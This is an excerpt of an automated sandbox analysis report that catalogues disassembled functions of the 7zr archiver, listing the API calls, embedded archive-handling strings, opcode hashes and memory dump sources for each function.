                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: Version
                                        • String ID:
                                        • API String ID: 1889659487-0
                                        • Opcode ID: 9d2d9f467db1bf2084ffdfe2613390edb9ae44591ffcab350cf0270388d7aaf8
                                        • Instruction ID: bab6f8577ce08ddcff05d262d5555a41538c3e500c75da105e7a9538ffd90336
                                        • Opcode Fuzzy Hash: 9d2d9f467db1bf2084ffdfe2613390edb9ae44591ffcab350cf0270388d7aaf8
                                        • Instruction Fuzzy Hash: 8ED02B7281541147F744772CC8063993763F7A1300FC80998DA60C1113F97EC645C2D6
                                        APIs
                                        • memcmp.MSVCRT(?,006548A0,00000010), ref: 005AC09E
                                        • memcmp.MSVCRT(?,00650258,00000010), ref: 005AC0BB
                                        • memcmp.MSVCRT(?,00650348,00000010), ref: 005AC0CE
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: memcmp
                                        • String ID:
                                        • API String ID: 1475443563-0
                                        • Opcode ID: 00635af68d28b4e66e08366007dc532765fe6fd0eca59f470e39be15a285bf14
                                        • Instruction ID: ba2f54938ac96f7c87d08347dd559339e2d9df50b661157b7fe9a501888d0e0b
                                        • Opcode Fuzzy Hash: 00635af68d28b4e66e08366007dc532765fe6fd0eca59f470e39be15a285bf14
                                        • Instruction Fuzzy Hash: 64915F71680611ABEB609B21DC45FAF7FA9BF66751F008429FD4ADB241F720EE08C790
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: $16-bit overflow for number of files in headers$32-bit overflow in headers$Central$Local$Minor_Extra_ERROR$Missing volume : $Unsorted_CD$Zip64$apk
                                        • API String ID: 3519838083-1909666238
                                        • Opcode ID: bc6113e16d1961037165074685bd523e92d11a36ab94372ac710cb31eec6bcca
                                        • Instruction ID: a963f993a8776a02078cb4b8aa1c46cde30c4bcc8688d33160dc32fe8d6ea261
                                        • Opcode Fuzzy Hash: bc6113e16d1961037165074685bd523e92d11a36ab94372ac710cb31eec6bcca
                                        • Instruction Fuzzy Hash: 2FC1C2B19802869FCB3DDF64C855AFF7B62EF42300F1984A9E2455B2A2DF319E45DB40
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005A64F8
                                        • GetCurrentThreadId.KERNEL32 ref: 005A6508
                                        • GetTickCount.KERNEL32 ref: 005A6513
                                        • GetCurrentProcessId.KERNEL32(?,?,00000000), ref: 005A651E
                                        • GetTickCount.KERNEL32 ref: 005A6578
                                        • SetLastError.KERNEL32(000000B7,?,?,?,?,00000000), ref: 005A65C5
                                        • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 005A65EC
                                          • Part of subcall function 005A5D7A: __EH_prolog.LIBCMT ref: 005A5D7F
                                          • Part of subcall function 005A5D7A: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000001,?,?,00000000), ref: 005A5DA1
                                          • Part of subcall function 005A1E40: free.MSVCRT ref: 005A1E44
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: CountCurrentErrorH_prologLastTick$CreateDirectoryProcessThreadfree
                                        • String ID: .tmp$d
                                        • API String ID: 1989517917-2797371523
                                        • Opcode ID: 1a1b8e2718dd71cc34c43dd7977d6509039a5cf605e56f786e08696f07ece97d
                                        • Instruction ID: 34fe9d884d55b85e15cb90c02d1cc65cf0020adb5a5c0b2fb1f0a9b13c8c1748
                                        • Opcode Fuzzy Hash: 1a1b8e2718dd71cc34c43dd7977d6509039a5cf605e56f786e08696f07ece97d
                                        • Instruction Fuzzy Hash: DB41E032D111169BDF15AFA4D85A7EDBFB2FF5B324F180529E402A72A2CB398900CB51
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: fputs
                                        • String ID: : Cannot open the file as [$ERROR$Open $WARNING$] archive
                                        • API String ID: 1795875747-657955069
                                        • Opcode ID: 81322714a6920851308604ebdce02014e501affdfc5a28734dae2d36432a3643
                                        • Instruction ID: 258f7e70e2e6a35a5344a8b3403d39dafdf4dad0ff76a660c954b0362b13be95
                                        • Opcode Fuzzy Hash: 81322714a6920851308604ebdce02014e501affdfc5a28734dae2d36432a3643
                                        • Instruction Fuzzy Hash: 4EF082316041197FC7202B956C85D2EFF5BEF86361B250027F90443251EE6218649EB5
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005EE774
                                          • Part of subcall function 005A3563: memmove.MSVCRT(?,?,00000022,00000000,?,005A1DAE,00000000,00000000,00000000,005A1D37,7FFFFFE0,00000000,00000000,?,00000000,00000000), ref: 005A3588
                                          • Part of subcall function 005EE6C2: __EH_prolog.LIBCMT ref: 005EE6C7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog$memmove
                                        • String ID: H e$P e$T e$\ e$hcf$mtf$rsfx
                                        • API String ID: 593149739-2667359998
                                        • Opcode ID: 8e8d9b50b547d4c603041f5c068939c571fc85ad16cde453fd274272e23b1e12
                                        • Instruction ID: e8a809c82b696758f8fa4047f9e23ff1bd2c03089435b64e0a8121efc7ccfd18
                                        • Opcode Fuzzy Hash: 8e8d9b50b547d4c603041f5c068939c571fc85ad16cde453fd274272e23b1e12
                                        • Instruction Fuzzy Hash: 5451E4309141868BCF28EF96C4976BEBFB2BF82314F14882AECD657282D7759D05C750
                                        APIs
                                          • Part of subcall function 00637D80: WaitForSingleObject.KERNEL32(?,000000FF,005BAFD6,?), ref: 00637D83
                                          • Part of subcall function 00637D80: GetLastError.KERNEL32(?,000000FF,005BAFD6,?), ref: 00637D8E
                                          • Part of subcall function 00632FB0: EnterCriticalSection.KERNEL32(?,?,?,00632749), ref: 00632FB8
                                          • Part of subcall function 00632FB0: LeaveCriticalSection.KERNEL32(?,?,?,00632749), ref: 00632FC2
                                        • EnterCriticalSection.KERNEL32(?), ref: 0063290E
                                        • LeaveCriticalSection.KERNEL32(?), ref: 00632928
                                        • EnterCriticalSection.KERNEL32(?), ref: 00632992
                                        • LeaveCriticalSection.KERNEL32(?), ref: 006329B8
                                        • EnterCriticalSection.KERNEL32(?), ref: 00632A1E
                                        • LeaveCriticalSection.KERNEL32(?), ref: 00632A56
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterLeave$ErrorLastObjectSingleWait
                                        • String ID: v
                                        • API String ID: 2116739831-3261393531
                                        • Opcode ID: 05810b6e7ac61ce242fb17090796addd01130dd8f0e00eb6f24154e2a8945d4e
                                        • Instruction ID: fdf88adede0e1712ee9b8022b96230edcab9a9fbdc78f1f674db5459557d9c8a
                                        • Opcode Fuzzy Hash: 05810b6e7ac61ce242fb17090796addd01130dd8f0e00eb6f24154e2a8945d4e
                                        • Instruction Fuzzy Hash: C9C15A756047068FC760DF29C5A0BA7B7E2FF98314F10492DE9AA87351EB30E949CB91
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prologfputs
                                        • String ID: Cannot open the file$The archive is open with offset$The file is open$WARNING:
                                        • API String ID: 1798449854-1259944392
                                        • Opcode ID: 541d67d11cd6e9b3164c7a84f3a9727a9d9d49335ade91aa5b4c8d37496bc678
                                        • Instruction ID: 94457f68223c655faea5c7b1cea242237fe4bccc58dee0f71df3211b8fdd93df
                                        • Opcode Fuzzy Hash: 541d67d11cd6e9b3164c7a84f3a9727a9d9d49335ade91aa5b4c8d37496bc678
                                        • Instruction Fuzzy Hash: D1217F35A005069FCB14EF98D946AAEBBA5FF95310F01042BE502977A2CB70AD028B94
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005AA091
                                          • Part of subcall function 005A9BAA: RegCloseKey.ADVAPI32(?,?,005A9BA0), ref: 005A9BB6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: CloseH_prolog
                                        • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$Previous Update Revision$Update Revision$x86
                                        • API String ID: 1579395594-270022386
                                        • Opcode ID: 0ad406e95b7671ef0e23e94cd4f505dfb9692a1dd5218ae28094aecfecbb14b8
                                        • Instruction ID: 35b3b5811a4887c45c5fe1e7121effb7ad4b94c767e0a06320c558b9ccfee8b1
                                        • Opcode Fuzzy Hash: 0ad406e95b7671ef0e23e94cd4f505dfb9692a1dd5218ae28094aecfecbb14b8
                                        • Instruction Fuzzy Hash: C051A271E0120AEFCF11EF98C8969AEBBB5FF5A300F41842DE512A7241DB709905CB91
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005FC453
                                          • Part of subcall function 005FC1DF: __EH_prolog.LIBCMT ref: 005FC1E4
                                          • Part of subcall function 005FC543: __EH_prolog.LIBCMT ref: 005FC548
                                          • Part of subcall function 005A1E0C: malloc.MSVCRT ref: 005A1E1F
                                          • Part of subcall function 005A1E0C: _CxxThrowException.MSVCRT(?,00654B28), ref: 005A1E39
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog$ExceptionThrowmalloc
                                        • String ID: ((e$<(e$L(e$\(e
                                        • API String ID: 3744649731-1619957961
                                        • Opcode ID: 468d7581a0f9c517f74004c500307ebbe9a8f159823ad7963b83fa48a93194a6
                                        • Instruction ID: 6879f8eec6c373118781789c1c02c2972e6909d62f5451f953aa5a68b82e285f
                                        • Opcode Fuzzy Hash: 468d7581a0f9c517f74004c500307ebbe9a8f159823ad7963b83fa48a93194a6
                                        • Instruction Fuzzy Hash: 822189B0900B498EC724DFAAC55866BFFF5FF91304F10895ED49697611DBB0AA08CB50
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005D46D4
                                        • EnterCriticalSection.KERNEL32(00662918), ref: 005D46E8
                                        • CompareFileTime.KERNEL32(?,?), ref: 005D4712
                                        • LeaveCriticalSection.KERNEL32(00662918), ref: 005D476A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: CriticalSection$CompareEnterFileH_prologLeaveTime
                                        • String ID: v
                                        • API String ID: 3800395459-3261393531
                                        • Opcode ID: 0ee92deb8de18cb66a49dcc1dc3875ebe5dfa2afdceab48c32e51cb65f22f472
                                        • Instruction ID: 46ae5d7918d687bf39959acb4b991a15b0d9ef0e1a173b35345fe35997a321d5
                                        • Opcode Fuzzy Hash: 0ee92deb8de18cb66a49dcc1dc3875ebe5dfa2afdceab48c32e51cb65f22f472
                                        • Instruction Fuzzy Hash: F0219A71500601AFDB308F28C488B9ABFB5FF82344F14851BE45A87611D730AA49CF90
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005D4642
                                        • EnterCriticalSection.KERNEL32(00662918), ref: 005D4656
                                        • LeaveCriticalSection.KERNEL32(00662918), ref: 005D4685
                                        • LeaveCriticalSection.KERNEL32(00662918), ref: 005D46C5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: CriticalSection$Leave$EnterH_prolog
                                        • String ID: v
                                        • API String ID: 2532973370-3261393531
                                        • Opcode ID: 2c9a3455026cf6a229b702519283948eaab36e3aadc5321f1aa4a895d5fba888
                                        • Instruction ID: d7f5d76e0c335de240de5401e52124533f374aadd16ee7e99b0726abe07a776e
                                        • Opcode Fuzzy Hash: 2c9a3455026cf6a229b702519283948eaab36e3aadc5321f1aa4a895d5fba888
                                        • Instruction Fuzzy Hash: 8B115E75A00601EFC724DF19C88496EBBA9FF9A720B10862EE40ADB700C775ED05CF90
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005D602A
                                        • EnterCriticalSection.KERNEL32(00662938), ref: 005D6044
                                        • LeaveCriticalSection.KERNEL32(00662938), ref: 005D6060
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterH_prologLeave
                                        • String ID: v$8)f
                                        • API String ID: 367238759-2823517967
                                        • Opcode ID: bd37cb31df51f8bdb1b39d906bcbfdc1b4161bf87f998dc35636cb2c7a76e8be
                                        • Instruction ID: 1dccdd688e34a5b0562cbd474ac7e468910aca07d865bdacdbbd3d96c94f8cdb
                                        • Opcode Fuzzy Hash: bd37cb31df51f8bdb1b39d906bcbfdc1b4161bf87f998dc35636cb2c7a76e8be
                                        • Instruction Fuzzy Hash: 8FF09A36901104EFC700CF98C809ADEBFB9FF86360F10806AF405A7311C7B69A00CBA0
                                        APIs
                                        • memset.MSVCRT ref: 006003F5
                                        • memcpy.MSVCRT(?,?,00000008,00000064,?,?,?,?,00000064), ref: 00600490
                                        • memset.MSVCRT ref: 00600618
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: memset$memcpy
                                        • String ID: $@
                                        • API String ID: 368790112-1077428164
                                        • Opcode ID: b087934bbc7c95f7ee7647cfdf8c5fba5a54d9d4edf4d7707c4dc34027eb37c2
                                        • Instruction ID: 77856c277a791083f8becfc5c97a200602818f5c29e2da4bfd894644ac2e590f
                                        • Opcode Fuzzy Hash: b087934bbc7c95f7ee7647cfdf8c5fba5a54d9d4edf4d7707c4dc34027eb37c2
                                        • Instruction Fuzzy Hash: 3291CF30980309EFEB69DF24C841BDBB7B3AF50304F14845DE59A562D2DB71AA99CF84
                                        APIs
                                          • Part of subcall function 00632FB0: EnterCriticalSection.KERNEL32(?,?,?,00632749), ref: 00632FB8
                                          • Part of subcall function 00632FB0: LeaveCriticalSection.KERNEL32(?,?,?,00632749), ref: 00632FC2
                                        • EnterCriticalSection.KERNEL32(?), ref: 0063290E
                                        • LeaveCriticalSection.KERNEL32(?), ref: 00632928
                                        • EnterCriticalSection.KERNEL32(?), ref: 00632992
                                        • LeaveCriticalSection.KERNEL32(?), ref: 006329B8
                                        • EnterCriticalSection.KERNEL32(?), ref: 00632A1E
                                        • LeaveCriticalSection.KERNEL32(?), ref: 00632A56
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterLeave
                                        • String ID: v
                                        • API String ID: 3168844106-3261393531
                                        • Opcode ID: 2e39fc7d48fd9ed5d669777fc3e5b631b6e2b48fb844fb0256971b5a183ea1ef
                                        • Instruction ID: 9679fbf71ff9f7defadef26a772c617edc583b0878ec85b076fd6092812533de
                                        • Opcode Fuzzy Hash: 2e39fc7d48fd9ed5d669777fc3e5b631b6e2b48fb844fb0256971b5a183ea1ef
                                        • Instruction Fuzzy Hash: 0961F7755047028FC761DF25C4A0BABB3F2BF98754F104A1DE9AA87351EB30E949CB91
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005A6141
                                          • Part of subcall function 005A6C72: __EH_prolog.LIBCMT ref: 005A6C77
                                        • SetLastError.KERNEL32(0000010B,00000000,00000000), ref: 005A6197
                                        • GetLastError.KERNEL32(?,?,?,0000005C,?,00000000,00000000), ref: 005A626E
                                        • SetLastError.KERNEL32(?,?,?,?,?,0000005C,?,00000000,00000000), ref: 005A62A9
                                          • Part of subcall function 005A6096: __EH_prolog.LIBCMT ref: 005A609B
                                          • Part of subcall function 005A6096: DeleteFileW.KERNEL32(?,?,?,00000000), ref: 005A60DF
                                        • GetLastError.KERNEL32(?,?,?,0000005C,?,00000000,00000000), ref: 005A6285
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: ErrorLast$H_prolog$DeleteFile
                                        • String ID:
                                        • API String ID: 3586524497-0
                                        • Opcode ID: 35358003652bea4feb4bbd7d9802d7934c622d1c412ab8d5478899c07748067c
                                        • Instruction ID: 1a2671a87d4fe5f73129e3aec8d8ff8e89e0585767cf46c9a54f718160e7f2cb
                                        • Opcode Fuzzy Hash: 35358003652bea4feb4bbd7d9802d7934c622d1c412ab8d5478899c07748067c
                                        • Instruction Fuzzy Hash: FA51DD31C0421AEADF15EBE8D85ABEDBFB9BF53350F144069E85273192CB351A0ACB51
                                        APIs
                                        • memcmp.MSVCRT(?,006548A0,00000010), ref: 005B44DB
                                        • memcmp.MSVCRT(?,00650128,00000010), ref: 005B44EE
                                        • memcmp.MSVCRT(?,00650228,00000010), ref: 005B450B
                                        • memcmp.MSVCRT(?,00650248,00000010), ref: 005B4528
                                        • memcmp.MSVCRT(?,006501C8,00000010), ref: 005B4545
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: memcmp
                                        • String ID:
                                        • API String ID: 1475443563-0
                                        • Opcode ID: c2fe881849b1e2ef06188a0a98cd92b7d34a4bac484a6da17d79b32a1c9245d4
                                        • Instruction ID: d6b07d9b7552dfa5f520ddec92535607c474d0f6d4abd8f581f2046af03ef247
                                        • Opcode Fuzzy Hash: c2fe881849b1e2ef06188a0a98cd92b7d34a4bac484a6da17d79b32a1c9245d4
                                        • Instruction Fuzzy Hash: 91218372B806086BE7348E149C81FFF77A9AF507A5F018538FD059A286FA64ED048B91
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813197143.000000000064C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813221834.0000000000662000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                        • Associated: 0000000A.00000002.1813243525.000000000066B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_5a0000_7zr.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID: !$LZMA2:$LZMA:
                                        • API String ID: 3519838083-3332058968
                                        • Opcode ID: 2efb8ba7fe4c3969e515766f0cb47482542fdcc168073861d9c043102fcdf90f
                                        • Instruction ID: 06bc7d1986d1e26228503e7ad317e9f9e37fd6bb0fe537278256c0e4d40607b7
                                        • Opcode Fuzzy Hash: 2efb8ba7fe4c3969e515766f0cb47482542fdcc168073861d9c043102fcdf90f
                                        • Instruction Fuzzy Hash: 0561D03190018A9EDF2DCB6AC459BFE7FB1BF56344F1444AAE4866B162C770EE82C740
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 005AA389
                                          • Part of subcall function 005AA4C5: GetModuleHandleW.KERNEL32(ntdll.dll,?,005AA3C1,00000001), ref: 005AA4CD
                                          • Part of subcall function 005AA4C5: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 005AA4DD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1813131163.00000000005A1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 005A0000, based on PE: true
                                        • Associated: 0000000A.00000002.1813113112.00000000005A0000.00000002.00000001.01000000.0000000A.sdmpDownload File
